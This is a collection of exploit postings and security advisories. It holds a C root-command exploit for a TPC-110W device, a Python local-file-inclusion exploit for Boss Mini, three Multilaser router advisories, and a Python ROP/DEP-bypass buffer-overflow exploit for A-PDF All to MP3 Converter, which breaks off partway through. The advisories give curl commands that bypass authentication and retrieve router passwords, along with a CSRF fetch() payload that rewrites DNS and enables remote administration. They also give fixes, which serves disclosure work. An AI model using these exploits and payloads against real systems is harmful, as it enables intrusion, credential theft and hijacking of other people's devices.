<pre><code>#include <stdio.h><br />#include <stdlib.h><br />#include <string.h><br />#include <sys/socket.h><br />#include <arpa/inet.h><br />#include <unistd.h><br /><br />int main(int argc, char *argv[]) {<br /> int sock;<br /> struct sockaddr_in serv_addr;<br /> char command[512];<br /><br /> sock = socket(AF_INET, SOCK_STREAM, 0);<br /> if (sock < 0) {<br /> perror("socket");<br /> exit(1);<br /> }<br /><br /> memset(&serv_addr, '0', sizeof(serv_addr));<br /> serv_addr.sin_family = AF_INET;<br /> serv_addr.sin_port = htons(8888); // The default port of TPC-110W is 8888<br /> if (inet_pton(AF_INET, "192.168.1.10", &serv_addr.sin_addr) <= 0) { // Assuming the device's IP address is 192.168.1.10<br /> perror("inet_pton");<br /> exit(1);<br /> }<br /><br /> if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {<br /> perror("connect");<br /> exit(1);<br /> }<br /><br /> // Run command with root privileges<br /> snprintf(command, sizeof(command), "id\n"); // Check user id<br /> write(sock, command, strlen(command));<br /><br /> memset(command, '0', sizeof(command));<br /> read(sock, command, sizeof(command));<br /> printf("%s\n", command);<br /><br /> close(sock);<br /> return 0;<br />}<br /><br />//gcc -o tpc-110w-exploit tpc-110w-exp<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Boss Mini 1.4.0 - local file inclusion<br /># Date: 07/12/2023<br /># Exploit Author: [nltt0] (https://github.com/nltt-br))<br /># CVE: CVE-2023-3643<br /><br /><br />'''<br /> _____ _ _____ <br />/ __ \ | | / ___|<br />| / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--. <br />| | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \<br />| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /<br /> \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ <br /> __/ | <br /> |___/ <br /><br />'''<br /><br />from requests import post <br />from urllib.parse import quote<br />from argparse import ArgumentParser<br /><br />try:<br /> parser = ArgumentParser(description='Local file inclusion [Boss Mini]')<br /> parser.add_argument('--domain', required=True, help='Application domain')<br /> parser.add_argument('--file', required=True, help='Local file')<br /><br /> args = parser.parse_args()<br /> host = args.domain<br /> file = args.file<br /> url = '{}/boss/servlet/document'.format(host)<br /> file2 = quote(file, safe='')<br /><br /> headers = {<br /> 'Host': host,<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',<br /> 'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)<br /> }<br /><br /><br /> data = {<br /> 'path': file2<br /> }<br /><br /> try:<br /> req = post(url, headers=headers, data=data, verify=False)<br /> if req.status_code == 200:<br /> print(req.text)<br /><br /> except Exception as e:<br /> print('Error in {}'.format(e)) <br /> <br /><br />except Exception as e:<br /> print('Error in {}'.format(e))<br /> <br /><br /></code></pre>
<pre><code>=====[Tempest Security Intelligence - Security Advisory -<br />CVE-2023-38946]=======<br /><br /> Access Control Bypass in Multilaser router's Web Management Interface<br /><br /> Author: Vinicius Moraes < vinicius.moraes.w () gmail com ><br /><br />=====[Table of<br />Contents]========================================================<br /><br />1. Overview<br />2. Detailed description<br />3. Other contexts & solutions<br />4. Acknowledgements<br />5. Timeline<br />6. References<br /><br />=====[1.<br />Overview]==============================================================<br /><br />* Systems affected: Multilaser RE160 web interface -<br />V5.07.51_pt_MTL01(verified)<br /> -<br />V5.07.52_pt_MTL01(verified)<br /> (other routers/versions may be<br />affected)<br />* Release date: 28/02/2024<br />* CVSS score: 7.7 / High<br />* CVSS vector:<br />CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N<br />* Impact: This vulnerability allows attackers to bypass the access control<br />of<br /> the router's web interface and perform management actions, such as<br /> changing the DNS settings, enabling router remote access,<br />changing the<br /> IP routing table, and retrieving the WiFi and management<br />application<br /> passwords. A noteworthy aspect also regards the fact that the<br />attack<br /> can be conducted remotely.<br /><br />=====[2. Detailed<br />description]==================================================<br /><br />The affected Multilaser router has a web management interface designed to<br />graphically assist users in configuring features and diagnosing problems.<br />However, there is a bug in its access control mechanism that allows<br />unauthenticated users to access the router's management features.<br /><br />In order to exploit this bug, it is necessary to add an "admin:" cookie in<br />the<br />requests. The following example shows how an unauthenticated user (not<br />bearing<br />a credential or session token) could perform it by using the curl tool[1]<br />to<br />retrieve, for example, a backup of the router config, which contains its<br />web<br />interface password:<br /><br />[snippet]<br /><br />$ # traditional unauthenticated request being redirected to the login page<br />$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E<br />'HTTP/|Locatio'<br />HTTP/1.0 302 Redirect<br />Location: http://[routerIpAddress]/login.asp<br />$<br />$ # malicious unauthenticated request getting the web interface password<br />$ # (in this example: "pass123")<br />$ curl -isH 'Cookie: admin:' [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg |<br />grep<br />-E 'HTTP/|http_passwd'<br />HTTP/1.0 200 OK<br />http_passwd=pass123<br /><br />[/snippet]<br /><br />By performing the aforementioned steps, an attacker gains access to all<br />features<br />of the web interface, either by exploiting the issue in other endpoints or<br />by<br />using the interface password, contained in the router config, as a<br />traditional<br />user.<br /><br />This vulnerability can be exploited remotely via a malicious mobile/desktop<br />application performing HTTP requests against the router, or locally by<br />connecting to a vulnerable router (such as through the wireless<br />infrastructure<br />of a coffee shop or airport).<br /><br />=====[3. Other contexts &<br />solutions]============================================<br /><br />Conceptually, in order to fix this issue, the server receiving the request<br />must<br />always validate the value of the cookie as a prerequisite for enforcing<br />access<br />control. Besides that, this value cannot be predictable. Upon not receiving<br />a<br />valid session token within the request, users should be redirected to the<br />login<br />page.<br /><br />Practically, updating to the latest firmware (V5.07.52_pt_MTL01) will<br />reduce the<br />attack window for this vulnerability, limiting the exploitation to only work<br />when there is an active user session on the router. However, this equipment<br />is<br />also affected by another vulnerability with the same impact and no attack<br />window<br />limitation[3].<br /><br />Furthermore, Multilaser informed that they contacted the firmware vendor of<br />the<br />model RE160, but due to the age of the equipment and its limitations, it<br />will<br />not receive an update. Therefore, it is recommended to replace the RE160<br />router<br />with a new one that is receiving updates (such as RE160V or RE163V)[4][5].<br /><br />=====[4.<br />Acknowledgements]======================================================<br /><br /> Joaquim Brasil de Oliveira < palulabrasil () gmail com ><br /> < twitter.com/palulabr ><br /> Tempest Security Intelligence[2]<br /><br />=====[5.<br />Timeline]==============================================================<br /><br />28/04/2023 - The bug regarding model RE160 was reported to vendor;<br />29/06/2023 - A new contact was made with the company;<br />29/06/2023 - Vendor sent the available latest firmware for RE160;<br />07/07/2023 - It was confirmed that the latest firmware was still vulnerable;<br />26/10/2023 - Vendor informed that RE160 will not receive a full fix.<br /><br />=====[6.<br />References]============================================================<br /><br /> [1] https://curl.se<br /> [2] https://tempest.com.br<br /> [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38945<br /> [4]<br />https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v<br /> [5]<br />https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v<br /><br /></code></pre>
<pre><code>=====[Tempest Security Intelligence - Security Advisory -<br />CVE-2023-38945]=======<br /><br /> Access Control Bypass in Multilaser routers' Web Management Interface<br /><br /> Author: Vinicius Moraes < vinicius.moraes.w () gmail com ><br /><br />=====[Table of<br />Contents]========================================================<br /><br />1. Overview<br />2. Detailed description<br />3. Other contexts & solutions<br />4. Acknowledgements<br />5. Timeline<br />6. References<br /><br />=====[1.<br />Overview]==============================================================<br /><br />* Systems affected: Multilaser RE160 web interface -<br />V5.07.51_pt_MTL01(verified)<br /> -<br />V5.07.52_pt_MTL01(verified)<br /> (other routers/versions may be<br />affected)<br /> Multilaser RE160V web interface - V12.03.01.08_pt<br />(verified)<br /> - V12.03.01.09_pt<br />(verified)<br /> (other routers/versions may be<br />affected)<br /> Multilaser RE163V web interface - V12.03.01.08_pt<br />(verified)<br /> (other routers/versions may be<br />affected)<br />* Release date: 28/02/2024<br />* CVSS score: 7.7 / High<br />* CVSS vector:<br />CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N<br />* Impact: This vulnerability allows attackers to bypass the access control<br />of<br /> the routers' web interface and perform management actions, such as<br /> changing the DNS settings, enabling router remote access,<br />changing the<br /> IP routing table, and retrieving the WiFi and management<br />application<br /> passwords. A noteworthy aspect also regards the fact that the<br />attack<br /> can be conducted remotely.<br /><br />=====[2. Detailed<br />description]==================================================<br /><br />The affected Multilaser routers have a web management interface designed to<br />graphically assist users in configuring features and diagnosing problems.<br />However, there is a bug in its access control mechanism that allows<br />unauthenticated users to access routers' management features.<br /><br />In order to exploit this bug, it is necessary to add a specific extension<br />at the<br />end of the URLs. Some acceptable extension values are: js, css, png, jpg,<br />gif,<br />jsp. The following example shows how an unauthenticated user (not bearing a<br />credential or session token) could perform it by using the curl tool[1] to<br />retrieve, for example, a backup of the RE160 router config, which contains<br />its<br />web interface password:<br /><br />[snippet]<br /><br />$ # traditional unauthenticated request being redirected to the login page<br />$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E<br />'HTTP/|Locatio'<br />HTTP/1.0 302 Redirect<br />Location: http://[routerIpAddress]/login.asp<br />$<br />$ # malicious unauthenticated request getting the web interface password<br />$ # (in this example: "pass123")<br />$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/.js | grep -E<br />'HTTP/|http_pass'<br />HTTP/1.0 200 OK<br />http_passwd=pass123<br /><br />[/snippet]<br /><br />Furthermore, the next example presents part of a JavaScript code that could<br />be<br />added to a malicious website with the purpose of changing the router's DNS<br />address and enabling remote access on vulnerable RE160V and RE163V routers.<br />This can be achieved by exploiting this access control issue and a CSRF[3]:<br /><br />[code]<br /><br />fetch('http://[routerIpAddress]/goform/setSysTools/.js', {<br /> 'method': 'POST',<br /> 'mode': 'no-cors',<br /> 'headers': {<br /> 'Content-Type': 'application/x-www-form-urlencoded'<br /> },<br /> 'body':<br />'module2=wanAdvCfg&module3=lanCfg&lanDns1=[newDnsAddress]&lanDns2=&<br /> module4=remoteWeb&remoteWebEn=true&remoteWebType=any&remoteWebPort=8080'<br />})<br /><br />[/code]<br /><br />By performing the aforementioned steps, an attacker can gain access to all<br />features of the web interface.<br /><br />This vulnerability can be exploited remotely via a malicious website or a<br />mobile/desktop application performing HTTP requests against the router. And<br />also locally, by connecting to a vulnerable router (such as through the<br />wireless<br />infrastructure of a coffee shop or airport).<br /><br />=====[3. Other contexts &<br />solutions]============================================<br /><br />Conceptually, in order to fix this issue, the server receiving the request<br />must<br />always validate the session token in authenticated features as a<br />prerequisite<br />for enforcing access control, regardless of any extension in the URL. Upon<br />not<br />receiving a valid session token within the request, users should be<br />redirected<br />to the login page.<br /><br />Practically, to mitigate this issue, the RE160V should be updated to<br />firmware<br />V12.03.01.12 or newer[4], the RE163V to firmware V12.03.01.10 or newer[5].<br />Multilaser informed that they contacted the firmware vendor of the model<br />RE160,<br />but due to the age of the equipment and its limitations, it will not<br />receive an<br />update to fix the issue. Therefore, it is recommended to replace the RE160<br />router with a new one that has received the fix (such as RE160V or RE163V).<br /><br />=====[4.<br />Acknowledgements]======================================================<br /><br /> Joaquim Brasil de Oliveira < palulabrasil () gmail com ><br /> < twitter.com/palulabr ><br /> Tempest Security Intelligence[2]<br /><br />=====[5.<br />Timeline]==============================================================<br /><br />13/02/2023 - The latest available firmware for model RE163V (V12.03.01.10)<br />fixed<br />the bug;<br />28/04/2023 - The bug regarding model RE160V was reported to the vendor;<br />29/06/2023 - A new contact was made with the company;<br />29/06/2023 - Vendor shared a firmware update (V12.03.01.09) for RE160V;<br />07/07/2023 - The same bug in model RE160 was reported to the vendor;<br />16/10/2023 - Vendor shared a new firmware for RE160V (V12.03.01.12) where<br />the<br />bug was fixed;<br />26/10/2023 - Vendor informed that RE160 will not receive a fix;<br />26/10/2023 - Vendor released the RE160V update on its website[4].<br /><br />=====[6.<br />References]============================================================<br /><br /> [1] https://curl.se<br /> [2] https://tempest.com.br<br /> [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31152<br /> [4]<br />https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v<br /> [5]<br />https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v<br /><br /></code></pre>
<pre><code>ulldisclosure-bounces@seclists.org><br />Status: RO<br />Content-Length: 5433<br />Lines: 153<br /><br />=====[Tempest Security Intelligence - Security Advisory -<br />CVE-2023-38944]=======<br /><br /> Access Control Bypass in Multilaser routers' Web Management Interface<br /><br /> Author: Vinicius Moraes < vinicius.moraes.w () gmail com ><br /><br />=====[Table of<br />Contents]========================================================<br /><br />1. Overview<br />2. Detailed description<br />3. Other contexts & solutions<br />4. Acknowledgements<br />5. Timeline<br />6. References<br /><br />=====[1.<br />Overview]==============================================================<br /><br />* Systems affected: Multilaser RE160V web interface - V12.03.01.09_pt<br />(verified)<br /> (other routers/versions may be<br />affected)<br /> Multilaser RE163V web interface - V12.03.01.10_pt<br />(verified)<br /> (other routers/versions may be<br />affected)<br />* Release date: 28/02/2024<br />* CVSS score: 7.7 / High<br />* CVSS vector:<br />CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N<br />* Impact: This vulnerability allows attackers to bypass the access control<br />of<br /> the routers' web interface and perform management actions, such as<br /> changing the DNS settings, enabling router remote access,<br />changing the<br /> IP routing table, and retrieving the WiFi and management<br />application<br /> passwords. A noteworthy aspect also regards the fact that the<br />attack<br /> can be conducted remotely.<br /><br />=====[2. Detailed<br />description]==================================================<br /><br />The affected Multilaser routers have a web management interface designed to<br />graphically assist users in configuring features and diagnosing problems.<br />However, there is a bug in its access control mechanism that allows<br />unauthenticated users to access the routers' management features.<br /><br />In order to exploit this bug, it is necessary to remove the Host header of<br />the<br />HTTP requests. The following example shows how an unauthenticated user (not<br />bearing a credential or session token) could perform it by using the curl<br />tool[1] to retrieve, for example, a backup of the router config:<br /><br />[snippet]<br />$ # traditional unauthenticated request being redirected to the login page<br />$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg | head -8<br />HTTP/1.0 302 Redirect<br />Server: GoAhead-Webs<br />Date: Sun Jun 28 11:59:42 2009<br />Pragma: no-cache<br />Cache-Control: no-cache<br />Content-Type: text/html<br />Location: http://[routerIpAddress]/login.html<br /><br />$ # malicious unauthenticated request getting the router config<br />$ curl -isOH 'Host:' [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg<br />$ head -8 RouterCfm.cfg<br />HTTP/1.0 200 OK<br />Date: Sun Jun 28 12:00:00 2009<br />Server: GoAhead-Webs<br />Last-modified: Sun Jun 28 12:00:00 2009<br />Content-length: 16108<br />Content-type: config/conf<br />Connection: close<br /><br />[/snippet]<br /><br />By performing the aforementioned steps, an attacker gains access to all<br />features<br />of the web interface, either by exploiting the issue in other endpoints or<br />by<br />using the interface password, contained in the router config, as a<br />traditional<br />user:<br /><br />[snippet]<br /><br />$ # getting the web interface password (in this example: "myPass333")<br />$ # stored in base64 in the config file<br />$ awk -F 'd=' '/http_passwd=/{ print $2 }' RouterCfm.cfg | tr -d '\15'<br />bXlQYXNzMzMz<br />$ # decoding the web interface password<br />$ echo "bXlQYXNzMzMz" | base64 -d<br />myPass333<br /><br />[/snippet]<br /><br />This vulnerability can be exploited remotely via a malicious mobile/desktop<br />application performing HTTP requests against the router, or locally by<br />connecting to a vulnerable router (such as through the wireless<br />infrastructure<br />of a coffee shop or airport).<br /><br />=====[3. Other contexts &<br />solutions]============================================<br /><br />Conceptually, in order to fix this issue, the server receiving the request<br />must<br />always validate the session token as a prerequisite for enforcing access<br />control, regardless of any header. Upon not receiving a valid session token<br />within the request, users should be redirected to the login page.<br /><br />Practically, to mitigate this issue, the routers should be updated to<br />firmware<br />V12.03.01.12 or newer[3][4].<br /><br />=====[4.<br />Acknowledgements]======================================================<br /><br /> Joaquim Brasil de Oliveira < palulabrasil () gmail com ><br /> < twitter.com/palulabr ><br /> Tempest Security Intelligence[2]<br /><br />=====[5.<br />Timeline]==============================================================<br /><br />28/04/2023 - The bug regarding model RE163V was reported to the vendor;<br />29/06/2023 - A new contact was made with the company;<br />29/06/2023 - Vendor informed they were analysing the bug;<br />19/07/2023 - Vendor shared a new firmware update for RE163V;<br />25/07/2023 - The same bug in model RE160V was reported to the vendor;<br />04/08/2023 - Vendor shared a new firmware update for RE163V;<br />30/08/2023 - Vendor fixed the bug in RE163V with firmware V12.03.01.12;<br />16/10/2023 - Vendor fixed the bug in RE160V with firmware V12.03.01.12;<br />26/10/2023 - vendor released the updates on its website[3][4].<br /><br />=====[6.<br />References]============================================================<br /><br /> [1] https://curl.se<br /> [2] https://tempest.com.br<br /> [3]<br />https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v<br /> [4]<br />https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v<br /><br /></code></pre>
<pre><code>#!/usr/bin/python<br /># Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain<br /># Date: 16 November 2023<br /># Exploit Author: George Washington<br /># Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm<br /># Software Link: http://www.a-pdf.com/all-to-mp3/download.htm<br /># Version: 2.0.0<br /># Tested on: Windows 7 Ultimate 6.1.7601 SP1 Build 7601 x64<br /># Based on: https://www.exploit-db.com/exploits/17275<br /># Remarks: There are some changes to the ROP gadgets obtained from Alltomp3.exe<br /># Video: https://youtu.be/_JEgdKjbtpI<br /><br />import socket, struct<br /><br />file = "1.wav"<br />size = 8000<br /><br />############ Parameters for HeapCreate() ############<br />EXE = b"ZZZZ" # HeapCreate()<br />EXE += b"AAAA" # RET<br />EXE += struct.pack("<I", 0x00040000) # Parameter 1 0x00040000<br />EXE += struct.pack("<I", 0x00000000) # Parameter 2 0x00000000<br />EXE += struct.pack("<I", 0x00000000) # Parameter 3 0x00000000<br />EXE += b"YYYY" # HeapAlloc()<br />EXE += b"BBBB" # RET<br />EXE += b"CCCC" # Parameter 1 hHandle<br />EXE += struct.pack("<I", 0x00000008) # Parameter 2 0x00000008<br />EXE += struct.pack("<I", 0x00000500) # Parameter 3 0x00000500<br />EXE += struct.pack("<I", 0x1002dd98) # _memcpy_s()<br />EXE += b"DDDD" # heap pointer<br />EXE += b"EEEE" # heap pointer<br />EXE += struct.pack("<I", 0x00000500) # size<br />EXE += b"GGGG" # shellcode pointer<br />EXE += struct.pack("<I", 0x00000500) # size<br /><br />junk = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1<br /><br />####################### STACK PIVOT ###########################<br />SEH = struct.pack("<I", 0x005CE870) # 0x005CE870 add esp 0x800, 4 pops, ret [alltomp3.exe]<br /><br />####################### 1. Get Stack Pointer to point to ZZZZ ###########################<br />ROP = struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **<br />ROP += b"A" * 8 <br />ROP += struct.pack("<I", 0x1003176D) # 0x1003176D 